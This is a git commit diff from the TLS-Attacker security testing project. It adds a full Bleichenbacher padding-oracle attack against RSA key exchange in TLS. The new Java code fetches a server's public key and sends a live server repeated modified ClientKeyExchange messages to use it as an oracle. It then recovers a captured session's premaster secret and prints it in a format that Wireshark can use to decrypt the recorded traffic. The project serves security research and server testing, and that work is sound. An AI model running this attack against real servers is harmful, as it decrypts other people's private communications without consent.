Merge pull request #336 from RUB-NDS/bleichenbacherFull

ic0ns · web-flow · commit 8e8219fea70b · 2017-10-12T18:47:00.000+02:00
Bleichenbacher full attack
diff --git a/Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/config/BleichenbacherCommandConfig.java b/Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/config/BleichenbacherCommandConfig.java
@@ -10,6 +10,7 @@
 
 import com.beust.jcommander.Parameter;
 import com.beust.jcommander.ParametersDelegate;
+import de.rub.nds.tlsattacker.attacks.config.delegate.AttackDelegate;
 import de.rub.nds.tlsattacker.core.config.Config;
 import de.rub.nds.tlsattacker.core.config.delegate.CiphersuiteDelegate;
 import de.rub.nds.tlsattacker.core.config.delegate.ClientDelegate;
@@ -19,6 +20,8 @@
 import de.rub.nds.tlsattacker.core.constants.CipherSuite;
 import java.util.LinkedList;
 import java.util.List;
+import org.apache.logging.log4j.Level;
+import org.apache.logging.log4j.core.config.Configurator;
 
 /**
  *
@@ -36,20 +39,40 @@ public class BleichenbacherCommandConfig extends AttackConfig {
     private CiphersuiteDelegate ciphersuiteDelegate;
     @ParametersDelegate
     private ProtocolVersionDelegate protocolVersionDelegate;
-
+    @ParametersDelegate
+    private AttackDelegate attackDelegate;
+    @Parameter(names = "-valid_response", description = "Bleichenbacher oracle responds with true if the last server "
+            + "message contains this string")
+    private String validResponseContent;
+    @Parameter(names = "-invalid_response", description = "Bleichenbacher oracle responds with false if the last server "
+            + "message contains this string")
+    private String invalidResponseContent;
+    @Parameter(names = "-encrypted_premaster_secret", description = "Encrypted premaster secret from the RSA client key "
+            + "exchange message. You can retrieve this message from the Wireshark traffic. Find the client key exchange "
+            + "message, right click on the \"EncryptedPremaster\" value and copy this value as a Hex Stream.")
+    private String encryptedPremasterSecret;
     @Parameter(names = "-type", description = "Type of the Bleichenbacher Test results in a different number of server test quries")
     private Type type = Type.FAST;
+    @Parameter(names = "-msgPkcsConform", description = "Used by the real Bleichenbacher attack. Indicates whether the original "
+            + "message that we are going to decrypt is PKCS#1 conform or not (more precisely, whether it starts with 0x00 0x02.")
+    private boolean msgPkcsConform = true;
 
     public BleichenbacherCommandConfig(GeneralDelegate delegate) {
         super(delegate);
         clientDelegate = new ClientDelegate();
         hostnameExtensionDelegate = new HostnameExtensionDelegate();
         ciphersuiteDelegate = new CiphersuiteDelegate();
         protocolVersionDelegate = new ProtocolVersionDelegate();
+        attackDelegate = new AttackDelegate();
         addDelegate(clientDelegate);
         addDelegate(hostnameExtensionDelegate);
         addDelegate(ciphersuiteDelegate);
         addDelegate(protocolVersionDelegate);
+        addDelegate(attackDelegate);
+
+        if (delegate.getLogLevel() != Level.ALL && delegate.getLogLevel() != Level.TRACE) {
+            Configurator.setAllLevels("de.rub.nds.tlsattacker.core", Level.ERROR);
+        }
     }
 
     public Type getType() {
@@ -79,12 +102,29 @@ public Config createConfig() {
 
     @Override
     public boolean isExecuteAttack() {
-        return false;
+        return attackDelegate.isExecuteAttack();
     }
 
-    public enum Type {
 
+    public String getValidResponseContent() {
+        return validResponseContent;
+    }
+
+    public String getInvalidResponseContent() {
+        return invalidResponseContent;
+    }
+
+    public String getEncryptedPremasterSecret() {
+        return encryptedPremasterSecret;
+    }
+
+    public boolean isMsgPkcsConform() {
+        return msgPkcsConform;
+    }
+    public enum Type {
+        
         FULL,
         FAST
     }
+
 }
diff --git a/Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/config/delegate/AttackDelegate.java b/Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/config/delegate/AttackDelegate.java
@@ -21,6 +21,8 @@ public class AttackDelegate extends Delegate {
 
     @Parameter(names = "-executeAttack", description = "If this value is set the Attack is not only Tested, but also executed (WARNING)")
     private boolean executeAttack = false;
+    public AttackDelegate() {
+    }
 
     public boolean isExecuteAttack() {
         return executeAttack;
@@ -30,8 +32,6 @@ public void setExecuteAttack(boolean executeAttack) {
         this.executeAttack = executeAttack;
     }
 
-    public AttackDelegate() {
-    }
 
     @Override
     public void applyDelegate(Config config) throws ConfigurationException {
diff --git a/Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/BleichenbacherAttacker.java
@@ -12,12 +12,15 @@
 import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray;
 import de.rub.nds.modifiablevariable.util.ArrayConverter;
 import de.rub.nds.tlsattacker.attacks.config.BleichenbacherCommandConfig;
+import de.rub.nds.tlsattacker.attacks.pkcs1.Bleichenbacher;
 import de.rub.nds.tlsattacker.attacks.pkcs1.PKCS1VectorGenerator;
+import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.RealDirectMessagePkcs1Oracle;
 import de.rub.nds.tlsattacker.core.config.Config;
 import de.rub.nds.tlsattacker.core.constants.AlertDescription;
 import de.rub.nds.tlsattacker.core.constants.AlertLevel;
 import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
 import de.rub.nds.tlsattacker.core.constants.ProtocolMessageType;
+import de.rub.nds.tlsattacker.core.exceptions.ConfigurationException;
 import de.rub.nds.tlsattacker.core.protocol.message.AlertMessage;
 import de.rub.nds.tlsattacker.core.protocol.message.ProtocolMessage;
 import de.rub.nds.tlsattacker.core.protocol.message.RSAClientKeyExchangeMessage;
@@ -29,7 +32,9 @@
 import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
 import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
 import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowTraceType;
+import java.math.BigInteger;
 import java.security.interfaces.RSAPublicKey;
+import java.util.Arrays;
 import java.util.HashSet;
 import java.util.LinkedList;
 import java.util.List;
@@ -53,14 +58,56 @@ public BleichenbacherAttacker(BleichenbacherCommandConfig config) {
 
     @Override
     public void executeAttack() {
-        throw new UnsupportedOperationException("Not implemented yet");
+        if (config.getInvalidResponseContent() == null && config.getValidResponseContent() == null) {
+            throw new ConfigurationException("You have to set a string contained in the last "
+                    + "protocol message sent by the server which will indicate whether the PKCS#1 "
+                    + "message was valid or not. For example, you can set the following parameter: "
+                    + "-invalid_response BAD_RECORD_MAC");
+        }
+        RSAPublicKey publicKey;
+        Config tlsConfig = config.createConfig();
+        publicKey = (RSAPublicKey) CertificateFetcher.fetchServerPublicKey(tlsConfig);
+        if (publicKey == null) {
+            LOGGER.info("Could not retrieve PublicKey from Server - is the Server running?");
+            return;
+        }
+        LOGGER.info("Fetched the following server public key: " + publicKey);
+
+        if (config.getEncryptedPremasterSecret() == null) {
+            throw new ConfigurationException("You have to set the encrypted premaster secret you are "
+                    + "going to decrypt");
+        }
+
+        byte[] pms = ArrayConverter.hexStringToByteArray(config.getEncryptedPremasterSecret());
+        if ((pms.length * 8) != publicKey.getModulus().bitLength()) {
+            throw new ConfigurationException("The length of the encrypted premaster secret you have "
+                    + "is not equal to the server public key length. Have you selected the correct value?");
+        }
+
+        RealDirectMessagePkcs1Oracle oracle = new RealDirectMessagePkcs1Oracle(publicKey, tlsConfig,
+                config.getValidResponseContent(), config.getInvalidResponseContent());
+
+        Bleichenbacher attacker = new Bleichenbacher(pms, oracle, config.isMsgPkcsConform());
+        attacker.attack();
+        BigInteger solution = attacker.getSolution();
+
+        LOGGER.info("Final solution: {}", solution.toString(16));
+
+        byte[] pmsResult = solution.toByteArray();
+        pmsResult = Arrays.copyOfRange(pmsResult, pmsResult.length - 46, pmsResult.length);
+        String pmsResultString = ArrayConverter.bytesToHexString(pmsResult, false).replace(" ", "");
+
+        LOGGER.info("If you have a TLS wireshark trace, you can decrypt it as follows. "
+                + "Create a file with the following content and use it as an input into "
+                + "wireshark:\n  CLIENT_RANDOM <client random> {}", pmsResultString);
+
     }
 
     private ProtocolMessage executeTlsFlow(byte[] encryptedPMS) {
         // we are initializing a new connection in every loop step, since most
         // of the known servers close the connection after an invalid handshake
         State state = new State(config.createConfig());
-        state.getConfig().setWorkflowTraceType(WorkflowTraceType.FULL);
+        state.getConfig().setWorkflowTraceType(WorkflowTraceType.HANDSHAKE);
         WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(state.getConfig()
                 .getWorkflowExecutorType(), state);
         WorkflowTrace trace = state.getWorkflowTrace();
diff --git a/Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/pkcs1/Bleichenbacher.java
@@ -19,7 +19,6 @@
  * 
  * @author Christopher Meyer - christopher.meyer@rub.de
  * @author Juraj Somorovsky - juraj.somorovsky@rub.de
- * @version 0.1
  */
 public class Bleichenbacher extends Pkcs1Attack {
 
@@ -46,7 +45,9 @@ public void attack() throws OracleException {
 
         LOGGER.debug("Step 1: Blinding");
         if (this.msgIsPKCS) {
-            LOGGER.debug("Step skipped --> " + "Message is considered as PKCS compliant.");
+            LOGGER.info("Step skipped --> " + "Message is considered as PKCS compliant.");
+            LOGGER.info("Testing the validity of the original message");
+            oracle.checkPKCSConformity(encryptedMsg);
             s0 = BigInteger.ONE;
             c0 = new BigInteger(1, encryptedMsg);
             m = new Interval[] { new Interval(BigInteger.valueOf(2).multiply(bigB),
@@ -58,17 +59,17 @@ public void attack() throws OracleException {
         i++;
 
         while (!solutionFound) {
-            LOGGER.debug("Step 2: Searching for PKCS conforming messages.");
+            LOGGER.info("Step 2: Searching for PKCS conforming messages.");
             stepTwo(i);
 
-            LOGGER.debug("Step 3: Narrowing the set of solutions.");
+            LOGGER.info("Step 3: Narrowing the set of solutions.");
             stepThree(i);
 
-            LOGGER.debug("Step 4: Computing the solution.");
+            LOGGER.info("Step 4: Computing the solution.");
             solutionFound = stepFour(i);
             i++;
 
-            LOGGER.debug("// Total # of queries so far: {}", oracle.getNumberOfQueries());
+            LOGGER.info("// Total # of queries so far: {}", oracle.getNumberOfQueries());
         }
     }
 
@@ -249,7 +250,7 @@ private boolean stepFour(final int i) {
             solution = s0.modInverse(publicKey.getModulus());
             solution = solution.multiply(m[0].upper).mod(publicKey.getModulus());
 
-            LOGGER.debug("====> Solution found!\n {}", ArrayConverter.bytesToHexString(solution.toByteArray()));
+            LOGGER.info("====> Solution found!\n {}", ArrayConverter.bytesToHexString(solution.toByteArray()));
 
             result = true;
         }
diff --git a/Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/pkcs1/oracles/RealDirectMessagePkcs1Oracle.java b/Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/pkcs1/oracles/RealDirectMessagePkcs1Oracle.java
@@ -11,31 +11,19 @@
 import de.rub.nds.modifiablevariable.bytearray.ByteArrayModificationFactory;
 import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray;
 import de.rub.nds.tlsattacker.core.config.Config;
+import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
 import de.rub.nds.tlsattacker.core.exceptions.WorkflowExecutionException;
-import de.rub.nds.tlsattacker.core.protocol.message.AlertMessage;
-import de.rub.nds.tlsattacker.core.protocol.message.CertificateMessage;
-import de.rub.nds.tlsattacker.core.protocol.message.ChangeCipherSpecMessage;
 import de.rub.nds.tlsattacker.core.protocol.message.ProtocolMessage;
 import de.rub.nds.tlsattacker.core.protocol.message.RSAClientKeyExchangeMessage;
-import de.rub.nds.tlsattacker.core.protocol.message.ServerHelloDoneMessage;
-import de.rub.nds.tlsattacker.core.protocol.message.ServerHelloMessage;
 import de.rub.nds.tlsattacker.core.state.State;
-import de.rub.nds.tlsattacker.core.state.TlsContext;
 import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutor;
 import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutorFactory;
-import de.rub.nds.tlsattacker.core.workflow.action.ReceiveAction;
-import de.rub.nds.tlsattacker.core.workflow.action.SendAction;
+import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
+import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
 import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowTraceType;
 import de.rub.nds.tlsattacker.util.MathHelper;
 import java.security.PublicKey;
 import java.security.interfaces.RSAPublicKey;
-import java.util.LinkedList;
-import java.util.List;
-import org.apache.logging.log4j.Level;
-import org.apache.logging.log4j.LogManager;
-import org.apache.logging.log4j.core.LoggerContext;
-import org.apache.logging.log4j.core.config.Configuration;
-import org.apache.logging.log4j.core.config.LoggerConfig;
 
 /**
  *
@@ -45,65 +33,59 @@ public class RealDirectMessagePkcs1Oracle extends Pkcs1Oracle {
 
     Config config;
 
-    public RealDirectMessagePkcs1Oracle(PublicKey pubKey, Config config) {
+    private final String validResponseContent;
+
+    private final String invalidResponseContent;
+
+    public RealDirectMessagePkcs1Oracle(PublicKey pubKey, Config config, String validResponseContent,
+            String invalidResponseContent) {
         this.publicKey = (RSAPublicKey) pubKey;
         this.blockSize = MathHelper.intceildiv(publicKey.getModulus().bitLength(), 8);
         this.config = config;
-        this.config.setWorkflowTraceType(WorkflowTraceType.HELLO);
-
-        LoggerContext ctx = (LoggerContext) LogManager.getContext(false);
-        Configuration ctxConfig = ctx.getConfiguration();
-        LoggerConfig loggerConfig = ctxConfig.getLoggerConfig(LogManager.ROOT_LOGGER_NAME);
-        loggerConfig.setLevel(Level.INFO);
-        ctx.updateLoggers();
+        this.validResponseContent = validResponseContent;
+        this.invalidResponseContent = invalidResponseContent;
     }
 
     @Override
     public boolean checkPKCSConformity(final byte[] msg) {
-
+        // we are initializing a new connection in every loop step, since most
+        // of the known servers close the connection after an invalid handshake
         State state = new State(config);
-        TlsContext tlsContext = state.getTlsContext();
-        WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(
-                config.getWorkflowExecutorType(), state);
+        state.getConfig().setWorkflowTraceType(WorkflowTraceType.FULL);
+        WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(state.getConfig()
+                .getWorkflowExecutorType(), state);
+        WorkflowTrace trace = state.getWorkflowTrace();
 
-        List<ProtocolMessage> protocolMessages = new LinkedList<>();
-        protocolMessages.add(new ServerHelloMessage(config));
-        protocolMessages.add(new CertificateMessage(config));
-        protocolMessages.add(new ServerHelloDoneMessage(config));
-        state.getWorkflowTrace().addTlsAction(new ReceiveAction(protocolMessages));
-        protocolMessages = new LinkedList<>();
-        RSAClientKeyExchangeMessage cke = new RSAClientKeyExchangeMessage(config);
-        protocolMessages.add(cke);
-        protocolMessages.add(new ChangeCipherSpecMessage(config));
-        state.getWorkflowTrace().addTlsAction(new SendAction(protocolMessages));
+        RSAClientKeyExchangeMessage cke = (RSAClientKeyExchangeMessage) WorkflowTraceUtil.getFirstSendMessage(
+                HandshakeMessageType.CLIENT_KEY_EXCHANGE, trace);
+        ModifiableByteArray epms = new ModifiableByteArray();
+        epms.setModification(ByteArrayModificationFactory.explicitValue(msg));
+        cke.setPublicKey(epms);
 
-        protocolMessages = new LinkedList<>();
-        protocolMessages.add(new AlertMessage(config));
-        state.getWorkflowTrace().addTlsAction(new ReceiveAction(protocolMessages));
-
-        ModifiableByteArray pms = new ModifiableByteArray();
-        pms.setModification(ByteArrayModificationFactory.explicitValue(msg));
-        cke.setPublicKey(pms);
-
-        if (numberOfQueries % 100 == 0) {
-            LOGGER.debug("Number of queries so far: {}", numberOfQueries);
+        numberOfQueries++;
+        if (numberOfQueries % 1000 == 0) {
+            LOGGER.info("Number of queries so far: {}", numberOfQueries);
         }
 
-        boolean valid = true;
+        boolean conform = false;
         try {
             workflowExecutor.executeWorkflow();
+            ProtocolMessage lastMessage = WorkflowTraceUtil.getLastReceivedMessage(trace);
+            if (lastMessage != null) {
+                String lastMessageLower = lastMessage.toString().toLowerCase();
+                if (validResponseContent != null) {
+                    conform = lastMessageLower.contains(validResponseContent.toLowerCase());
+                } else if (invalidResponseContent != null) {
+                    conform = !lastMessageLower.contains(invalidResponseContent.toLowerCase());
+                }
+            }
         } catch (WorkflowExecutionException e) {
             // TODO implementing the orcale through caught exceptions is not
             // smart
-            valid = false;
-            e.printStackTrace();
-        } finally {
-            numberOfQueries++;
-        }
-        if (tlsContext.isReceivedFatalAlert()) {
-            valid = false;
+            conform = false;
+            LOGGER.info(e.getLocalizedMessage(), e);
         }
 
-        return valid;
+        return conform;
     }
 }
diff --git a/Attacks/src/test/java/de/rub/nds/tlsattacker/attacks/pkcs1/BleichenbacherAttackPlaintextTest.java b/Attacks/src/test/java/de/rub/nds/tlsattacker/attacks/pkcs1/BleichenbacherAttackPlaintextTest.java
diff --git a/Attacks/src/test/java/de/rub/nds/tlsattacker/attacks/pkcs1/MangerAttackServerTest.java b/Attacks/src/test/java/de/rub/nds/tlsattacker/attacks/pkcs1/MangerAttackServerTest.java
